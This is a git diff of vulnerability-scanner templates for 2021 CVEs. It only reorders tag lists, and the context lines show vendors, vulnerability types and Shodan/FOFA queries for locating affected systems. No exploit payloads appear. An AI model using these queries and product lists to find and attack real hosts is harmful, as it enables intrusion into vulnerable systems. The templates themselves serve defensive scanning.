- tags: cve,cve2021,draytek,lfi,vigorconnect,tenable
+ tags: cve2021,cve,draytek,lfi,vigorconnect,tenable
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml
index b6e4cc8a29..b28ad4bdf6 100644
--- a/http/cves/2021/CVE-2021-20137.yaml
+++ b/http/cves/2021/CVE-2021-20137.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: gryphonconnect
product: gryphon_tower_firmware
- tags: xss,tenable,cve,cve2021,gryphon,gryphonconnect
+ tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml
index 66617f48cf..76ad1fb237 100644
--- a/http/cves/2021/CVE-2021-20150.yaml
+++ b/http/cves/2021/CVE-2021-20150.yaml
@@ -25,7 +25,7 @@ info:
vendor: trendnet
product: tew-827dru_firmware
shodan-query: http.html:"TEW-827DRU"
- tags: disclosure,router,tenable,cve,cve2021,trendnet
+ tags: cve2021,cve,disclosure,router,tenable,trendnet
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml
index fb3586a07f..51ad7ecb30 100644
--- a/http/cves/2021/CVE-2021-20158.yaml
+++ b/http/cves/2021/CVE-2021-20158.yaml
@@ -25,7 +25,7 @@ info:
vendor: trendnet
product: tew-827dru_firmware
shodan-query: http.html:"TEW-827DRU"
- tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet
+ tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet
variables:
password: "{{rand_base(6)}}"
diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml
index 7959c899f0..22d63a400c 100644
--- a/http/cves/2021/CVE-2021-20167.yaml
+++ b/http/cves/2021/CVE-2021-20167.yaml
@@ -22,7 +22,7 @@ info:
max-request: 1
vendor: netgear
product: rax43_firmware
- tags: tenable,cve,cve2021,netgear,rce,router
+ tags: cve2021,cve,tenable,netgear,rce,router
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml
index 43779fe70f..225864b59d 100644
--- a/http/cves/2021/CVE-2021-20323.yaml
+++ b/http/cves/2021/CVE-2021-20323.yaml
@@ -31,7 +31,7 @@ info:
vendor: redhat
product: keycloak
shodan-query: html:"Keycloak"
- tags: cve,cve2021,keycloak,xss,redhat
+ tags: cve2021,cve,keycloak,xss,redhat
http:
- method: POST
diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml
index b379aa7995..5711d29416 100644
--- a/http/cves/2021/CVE-2021-20792.yaml
+++ b/http/cves/2021/CVE-2021-20792.yaml
@@ -28,7 +28,7 @@ info:
vendor: expresstech
product: quiz_and_survey_master
framework: wordpress
- tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan,expresstech
+ tags: cve2021,cve,wordpress,wp-plugin,authenticated,wpscan,expresstech
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml
index 7d0c8754f5..55790a5d77 100644
--- a/http/cves/2021/CVE-2021-20837.yaml
+++ b/http/cves/2021/CVE-2021-20837.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: sixapart
product: movable_type
- tags: packetstorm,cve,cve2021,rce,movable,sixapart
+ tags: cve2021,cve,packetstorm,rce,movable,sixapart
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml
index c17221fa6d..8925d48610 100644
--- a/http/cves/2021/CVE-2021-21087.yaml
+++ b/http/cves/2021/CVE-2021-21087.yaml
@@ -27,7 +27,7 @@ info:
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
- tags: cve,cve2021,xss,adobe,misc,coldfusion
+ tags: cve2021,cve,xss,adobe,misc,coldfusion
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml
index c4bb6ab017..5599181ee6 100644
--- a/http/cves/2021/CVE-2021-21234.yaml
+++ b/http/cves/2021/CVE-2021-21234.yaml
@@ -29,7 +29,7 @@ info:
max-request: 4
vendor: spring-boot-actuator-logview_project
product: spring-boot-actuator-logview
- tags: cve,cve2021,springboot,lfi,actuator,spring-boot-actuator-logview_project
+ tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml
index 9f6b181e12..fae3e73b11 100644
--- a/http/cves/2021/CVE-2021-21307.yaml
+++ b/http/cves/2021/CVE-2021-21307.yaml
@@ -26,7 +26,7 @@ info:
max-request: 3
vendor: lucee
product: lucee_server
- tags: cve,cve2021,rce,lucee,adobe
+ tags: cve2021,cve,rce,lucee,adobe
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml
index ec8587d996..8611084d0d 100644
--- a/http/cves/2021/CVE-2021-21311.yaml
+++ b/http/cves/2021/CVE-2021-21311.yaml
@@ -29,7 +29,7 @@ info:
shodan-query: title:"Login - Adminer"
fofa-query: app="Adminer" && body="4.7.8"
hunter-query: app.name="Adminer"&&web.body="4.7.8"
- tags: cve,cve2021,adminer,ssrf
+ tags: cve2021,cve,adminer,ssrf
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml
index 4ca3106a2c..ed5ef3564b 100644
--- a/http/cves/2021/CVE-2021-21315.yaml
+++ b/http/cves/2021/CVE-2021-21315.yaml
@@ -27,7 +27,7 @@ info:
vendor: systeminformation
product: systeminformation
framework: node.js
- tags: nodejs,cve,cve2021,kev,systeminformation,node.js
+ tags: cve,cve2021,nodejs,kev,systeminformation,node.js
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml
index 228344ba08..6c503f7218 100644
--- a/http/cves/2021/CVE-2021-21345.yaml
+++ b/http/cves/2021/CVE-2021-21345.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: xstream_project
product: xstream
- tags: cve,cve2021,xstream,deserialization,rce,oast,xstream_project
+ tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml
index b42fa73cd0..cb891a86b5 100644
--- a/http/cves/2021/CVE-2021-21351.yaml
+++ b/http/cves/2021/CVE-2021-21351.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: xstream_project
product: xstream
- tags: cve,cve2021,xstream,deserialization,rce,oast,vulhub,xstream_project
+ tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml
index 95226f2619..9f0724447b 100644
--- a/http/cves/2021/CVE-2021-21389.yaml
+++ b/http/cves/2021/CVE-2021-21389.yaml
@@ -27,7 +27,7 @@ info:
vendor: buddypress
product: buddypress
framework: wordpress
- tags: cve,cve2021,wordpress,wp-plugin,rce,wp,buddypress
+ tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml
index 435dcc0353..42aa2d8d70 100644
--- a/http/cves/2021/CVE-2021-21745.yaml
+++ b/http/cves/2021/CVE-2021-21745.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: zte
product: mf971r_firmware
- tags: zte,auth-bypass,cve,cve2021,router
+ tags: cve2021,cve,zte,auth-bypass,router
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml
index fa8dd37da0..23983d3aa9 100644
--- a/http/cves/2021/CVE-2021-21799.yaml
+++ b/http/cves/2021/CVE-2021-21799.yaml
@@ -27,7 +27,7 @@ info:
vendor: advantech
product: r-seenet
shodan-query: http.html:"R-SeeNet"
- tags: cve,cve2021,xss,r-seenet,advantech
+ tags: cve2021,cve,xss,r-seenet,advantech
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml
index 0f46afd93e..d435a5f28f 100644
--- a/http/cves/2021/CVE-2021-21800.yaml
+++ b/http/cves/2021/CVE-2021-21800.yaml
@@ -25,7 +25,7 @@ info:
vendor: advantech
product: r-seenet
shodan-query: http.html:"R-SeeNet"
- tags: cve,cve2021,xss,r-seenet,advantech
+ tags: cve2021,cve,xss,r-seenet,advantech
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml
index fd739617a7..6dde51f136 100644
--- a/http/cves/2021/CVE-2021-21801.yaml
+++ b/http/cves/2021/CVE-2021-21801.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: advantech
product: r-seenet
- tags: cve,cve2021,rseenet,xss,graph,advantech
+ tags: cve2021,cve,rseenet,xss,graph,advantech
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml
index 58182f6436..270ac8a58b 100644
--- a/http/cves/2021/CVE-2021-21802.yaml
+++ b/http/cves/2021/CVE-2021-21802.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: advantech
product: r-seenet
- tags: cve,cve2021,rseenet,xss,advantech
+ tags: cve2021,cve,rseenet,xss,advantech
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml
index d114710d49..0ba8647279 100644
--- a/http/cves/2021/CVE-2021-21803.yaml
+++ b/http/cves/2021/CVE-2021-21803.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: advantech
product: r-seenet
- tags: cve,cve2021,rseenet,xss,advantech
+ tags: cve2021,cve,rseenet,xss,advantech
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml
index dd962b5b44..8c521434ef 100644
--- a/http/cves/2021/CVE-2021-21805.yaml
+++ b/http/cves/2021/CVE-2021-21805.yaml
@@ -28,7 +28,7 @@ info:
vendor: advantech
product: r-seenet
shodan-query: http.html:"R-SeeNet"
- tags: cve,cve2021,rce,r-seenet,advantech
+ tags: cve2021,cve,rce,r-seenet,advantech
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml
index 5f21ed004a..05f530d892 100644
--- a/http/cves/2021/CVE-2021-21816.yaml
+++ b/http/cves/2021/CVE-2021-21816.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: dlink
product: dir-3040_firmware
- tags: cve,cve2021,dlink,exposure,router,syslog
+ tags: cve2021,cve,dlink,exposure,router,syslog
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml
index f40bec2a17..979c8b2420 100644
--- a/http/cves/2021/CVE-2021-21881.yaml
+++ b/http/cves/2021/CVE-2021-21881.yaml
@@ -24,7 +24,7 @@ info:
max-request: 2
vendor: lantronix
product: premierwave_2050_firmware
- tags: cve,cve2021,lantronix,rce,oast,cisco
+ tags: cve2021,cve,lantronix,rce,oast,cisco
variables:
useragent: '{{rand_base(6)}}'
diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml
index 17be68680a..653f95a785 100644
--- a/http/cves/2021/CVE-2021-21972.yaml
+++ b/http/cves/2021/CVE-2021-21972.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: vmware
product: cloud_foundation
- tags: cve2021,vmware,rce,vcenter,kev,packetstorm,cve
+ tags: cve2021,cve,vmware,rce,vcenter,kev,packetstorm
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml
index 7a27fed3fa..735a261603 100644
--- a/http/cves/2021/CVE-2021-21973.yaml
+++ b/http/cves/2021/CVE-2021-21973.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: vmware
product: cloud_foundation
- tags: cve,cve2021,vmware,ssrf,vcenter,oast,kev
+ tags: cve2021,cve,vmware,ssrf,vcenter,oast,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml
index ce9462e06c..82604a543c 100644
--- a/http/cves/2021/CVE-2021-21975.yaml
+++ b/http/cves/2021/CVE-2021-21975.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: vmware
product: cloud_foundation
- tags: kev,packetstorm,cve,cve2021,ssrf,vmware,vrealize
+ tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml
index 98697331a8..1f19c699ec 100644
--- a/http/cves/2021/CVE-2021-21978.yaml
+++ b/http/cves/2021/CVE-2021-21978.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: vmware
product: view_planner
- tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive
+ tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml
index 2c60db7477..2a23b8cbf9 100644
--- a/http/cves/2021/CVE-2021-21985.yaml
+++ b/http/cves/2021/CVE-2021-21985.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: vmware
product: vcenter_server
- tags: packetstorm,cve,cve2021,rce,vsphere,vmware,kev
+ tags: cve2021,cve,packetstorm,rce,vsphere,vmware,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml
index f2f13febee..9619ac508d 100644
--- a/http/cves/2021/CVE-2021-22005.yaml
+++ b/http/cves/2021/CVE-2021-22005.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: vmware
product: cloud_foundation
- tags: cve,cve2021,vmware,vcenter,fileupload,kev,intrusive
+ tags: cve2021,cve,vmware,vcenter,fileupload,kev,intrusive
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml
index a35b03bb8e..cb85a5d5f3 100644
--- a/http/cves/2021/CVE-2021-22053.yaml
+++ b/http/cves/2021/CVE-2021-22053.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: vmware
product: spring_cloud_netflix
- tags: rce,spring,cve,cve2021,vmware
+ tags: cve,cve2021,rce,spring,vmware
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml
index 77fb1d7cd6..4acd1592db 100644
--- a/http/cves/2021/CVE-2021-22054.yaml
+++ b/http/cves/2021/CVE-2021-22054.yaml
@@ -26,7 +26,7 @@ info:
vendor: vmware
product: workspace_one_uem_console
fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx"
- tags: cve,cve2021,vmware,workspace,ssrf
+ tags: cve2021,cve,vmware,workspace,ssrf
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml
index 9577b017d7..80bfb4983f 100644
--- a/http/cves/2021/CVE-2021-22122.yaml
+++ b/http/cves/2021/CVE-2021-22122.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: fortinet
product: fortiweb
- tags: cve,cve2021,fortiweb,xss,fortinet
+ tags: cve2021,cve,fortiweb,xss,fortinet
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml
index 0bff722753..2e2e008701 100644
--- a/http/cves/2021/CVE-2021-22145.yaml
+++ b/http/cves/2021/CVE-2021-22145.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: elastic
product: elasticsearch
- tags: cve,cve2021,elasticsearch,packetstorm,elastic
+ tags: cve2021,cve,elasticsearch,packetstorm,elastic
http:
- method: POST
diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml
index 2219e695a6..50f287bdf8 100644
--- a/http/cves/2021/CVE-2021-22205.yaml
+++ b/http/cves/2021/CVE-2021-22205.yaml
@@ -30,7 +30,7 @@ info:
vendor: gitlab
product: gitlab
shodan-query: http.title:"GitLab"
- tags: kev,hackerone,cve,cve2021,gitlab,rce
+ tags: cve2021,cve,kev,hackerone,gitlab,rce
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml
index a5e127c9a6..c3168952ca 100644
--- a/http/cves/2021/CVE-2021-22214.yaml
+++ b/http/cves/2021/CVE-2021-22214.yaml
@@ -32,7 +32,7 @@ info:
vendor: gitlab
product: gitlab
shodan-query: http.title:"GitLab"
- tags: cve,cve2021,gitlab,ssrf
+ tags: cve2021,cve,gitlab,ssrf
http:
- method: POST
diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml
index 5932a81869..4f73989c3f 100644
--- a/http/cves/2021/CVE-2021-22502.yaml
+++ b/http/cves/2021/CVE-2021-22502.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: microfocus
product: operation_bridge_reporter
- tags: cve,cve2021,microfocus,obr,rce,kev
+ tags: cve2021,cve,microfocus,obr,rce,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml
index 29bb11b059..d7909a2da8 100644
--- a/http/cves/2021/CVE-2021-22707.yaml
+++ b/http/cves/2021/CVE-2021-22707.yaml
@@ -27,7 +27,7 @@ info:
product: evlink_city_evc1s22p4_firmware
shodan-query: title:"EVSE web interface"
fofa-query: title="EVSE web interface"
- tags: cve,cve2021,evlink,auth-bypass,schneider-electric
+ tags: cve2021,cve,evlink,auth-bypass,schneider-electric
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml
index 371a71df39..51ca9abbcd 100644
--- a/http/cves/2021/CVE-2021-22873.yaml
+++ b/http/cves/2021/CVE-2021-22873.yaml
@@ -29,7 +29,7 @@ info:
vendor: revive-adserver
product: revive_adserver
shodan-query: http.favicon.hash:106844876
- tags: hackerone,seclists,packetstorm,cve2021,redirect,revive,cve,revive-adserver
+ tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml
index 535d28419f..31a1e713e7 100644
--- a/http/cves/2021/CVE-2021-22911.yaml
+++ b/http/cves/2021/CVE-2021-22911.yaml
@@ -30,7 +30,7 @@ info:
vendor: rocket.chat
product: rocket.chat
shodan-query: http.title:"Rocket.Chat"
- tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021,rocket.chat
+ tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml
index 63507d0b06..bf2cacc6d3 100644
--- a/http/cves/2021/CVE-2021-22986.yaml
+++ b/http/cves/2021/CVE-2021-22986.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: f5
product: big-ip_access_policy_manager
- tags: bigip,cve,cve2021,rce,kev,packetstorm,f5
+ tags: cve,cve2021,bigip,rce,kev,packetstorm,f5
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml
index 00f554219f..34941a6bc1 100644
--- a/http/cves/2021/CVE-2021-23241.yaml
+++ b/http/cves/2021/CVE-2021-23241.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: mercusys
product: mercury_x18g_firmware
- tags: cve,cve2021,iot,lfi,router,mercusys
+ tags: cve2021,cve,iot,lfi,router,mercusys
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml
index a66a27dc6b..7dc02e05b6 100644
--- a/http/cves/2021/CVE-2021-24145.yaml
+++ b/http/cves/2021/CVE-2021-24145.yaml
@@ -28,7 +28,7 @@ info:
vendor: webnus
product: modern_events_calendar_lite
framework: wordpress
- tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive,webnus
+ tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml
index 2f5276728f..b3e399e622 100644
--- a/http/cves/2021/CVE-2021-24146.yaml
+++ b/http/cves/2021/CVE-2021-24146.yaml
@@ -26,7 +26,7 @@ info:
vendor: webnus
product: modern_events_calendar_lite
framework: wordpress
- tags: cve2021,wpscan,packetstorm,wordpress,wp-plugin,cve,webnus
+ tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml
index de95a74c8f..3e257a388c 100644
--- a/http/cves/2021/CVE-2021-24150.yaml
+++ b/http/cves/2021/CVE-2021-24150.yaml
@@ -28,7 +28,7 @@ info:
vendor: likebtn-like-button_project
product: likebtn-like-button
framework: wordpress
- tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project
+ tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml
index 9c63190fdc..dd634e0922 100644
--- a/http/cves/2021/CVE-2021-24155.yaml
+++ b/http/cves/2021/CVE-2021-24155.yaml
@@ -28,7 +28,7 @@ info:
vendor: backup-guard
product: backup_guard
framework: wordpress
- tags: authenticated,wp,packetstorm,wp-plugin,cve2021,rce,wordpress,cve,backup,wpscan,intrusive,backup-guard
+ tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml
index 83dabbfe1c..7823bc05a7 100644
--- a/http/cves/2021/CVE-2021-24165.yaml
+++ b/http/cves/2021/CVE-2021-24165.yaml
@@ -27,7 +27,7 @@ info:
vendor: ninjaforms
product: ninja_forms
framework: wordpress
- tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms
+ tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml
index c7900f5fcb..872a699cc8 100644
--- a/http/cves/2021/CVE-2021-24169.yaml
+++ b/http/cves/2021/CVE-2021-24169.yaml
@@ -28,7 +28,7 @@ info:
vendor: algolplus
product: advanced_order_export
framework: wordpress
- tags: wordpress,authenticated,wpscan,cve,cve2021,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus
+ tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml
index e7d59657a6..42608403d4 100644
--- a/http/cves/2021/CVE-2021-24176.yaml
+++ b/http/cves/2021/CVE-2021-24176.yaml
@@ -27,7 +27,7 @@ info:
vendor: jh_404_logger_project
product: jh_404_logger
framework: wordpress
- tags: cve,cve2021,wordpress,wp-plugin,xss,wpscan,jh_404_logger_project
+ tags: cve2021,cve,wordpress,wp-plugin,xss,wpscan,jh_404_logger_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml
index 3e9fa55202..a649d4d98c 100644
--- a/http/cves/2021/CVE-2021-24210.yaml
+++ b/http/cves/2021/CVE-2021-24210.yaml
@@ -27,7 +27,7 @@ info:
vendor: kiboit
product: phastpress
framework: wordpress
- tags: cve2021,redirect,wpscan,wordpress,cve,kiboit
+ tags: cve2021,cve,redirect,wpscan,wordpress,kiboit
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml
index 98bc98fe23..45768987f7 100644
--- a/http/cves/2021/CVE-2021-24214.yaml
+++ b/http/cves/2021/CVE-2021-24214.yaml
@@ -27,7 +27,7 @@ info:
vendor: daggerhartlab
product: openid_connect_generic_client
framework: wordpress
- tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,wp,openid,daggerhartlab
+ tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml
index ff34e970d1..435e692908 100644
--- a/http/cves/2021/CVE-2021-24215.yaml
+++ b/http/cves/2021/CVE-2021-24215.yaml
@@ -28,7 +28,7 @@ info:
product: controlled_admin_access
framework: wordpress
publicwww-query: /wp-content/plugins/controlled-admin-access/
- tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby
+ tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml
index 0ca21195d5..0a8caef113 100644
--- a/http/cves/2021/CVE-2021-24226.yaml
+++ b/http/cves/2021/CVE-2021-24226.yaml
@@ -25,7 +25,7 @@ info:
vendor: accessally
product: accessally
framework: wordpress
- tags: wordpress,cve,cve2021,wp-plugin,wpscan,accessally
+ tags: cve2021,cve,wordpress,wp-plugin,wpscan,accessally
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml
index 6b5a83d97e..fb12e8a23a 100644
--- a/http/cves/2021/CVE-2021-24227.yaml
+++ b/http/cves/2021/CVE-2021-24227.yaml
@@ -27,7 +27,7 @@ info:
vendor: patreon
product: patreon_wordpress
framework: wordpress
- tags: wordpress,patreon-connect,unauth,cve2021,lfi,patreon,wp,wpscan,cve
+ tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml
index 5173993f91..5f338b8d06 100644
--- a/http/cves/2021/CVE-2021-24235.yaml
+++ b/http/cves/2021/CVE-2021-24235.yaml
@@ -27,7 +27,7 @@ info:
vendor: boostifythemes
product: goto
framework: wordpress
- tags: xss,wp-theme,wpscan,cve,cve2021,wordpress,boostifythemes
+ tags: cve2021,cve,xss,wp-theme,wpscan,wordpress,boostifythemes
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml
index d870649232..fc5e708645 100644
--- a/http/cves/2021/CVE-2021-24236.yaml
+++ b/http/cves/2021/CVE-2021-24236.yaml
@@ -28,7 +28,7 @@ info:
vendor: imagements_project
product: imagements
framework: wordpress
- tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive,imagements_project
+ tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project
variables:
php: "{{to_lower('{{randstr}}')}}.php"
post: "1"
diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml
index 1db715adbd..a37d3cabfa 100644
--- a/http/cves/2021/CVE-2021-24237.yaml
+++ b/http/cves/2021/CVE-2021-24237.yaml
@@ -28,7 +28,7 @@ info:
vendor: purethemes
product: findeo
framework: wordpress
- tags: cve,cve2021,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes
+ tags: cve2021,cve,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml
index 0b6b60d600..1667c75cbd 100644
--- a/http/cves/2021/CVE-2021-24239.yaml
+++ b/http/cves/2021/CVE-2021-24239.yaml
@@ -27,7 +27,7 @@ info:
vendor: genetechsolutions
product: pie_register
framework: wordpress
- tags: cve,cve2021,xss,pie-register,wp,wpscan,genetechsolutions,wordpress
+ tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml
index a0cfb96b93..985db96377 100644
--- a/http/cves/2021/CVE-2021-24245.yaml
+++ b/http/cves/2021/CVE-2021-24245.yaml
@@ -27,7 +27,7 @@ info:
vendor: trumani
product: stop_spammers
framework: wordpress
- tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,packetstorm,trumani
+ tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani
http:
- raw:
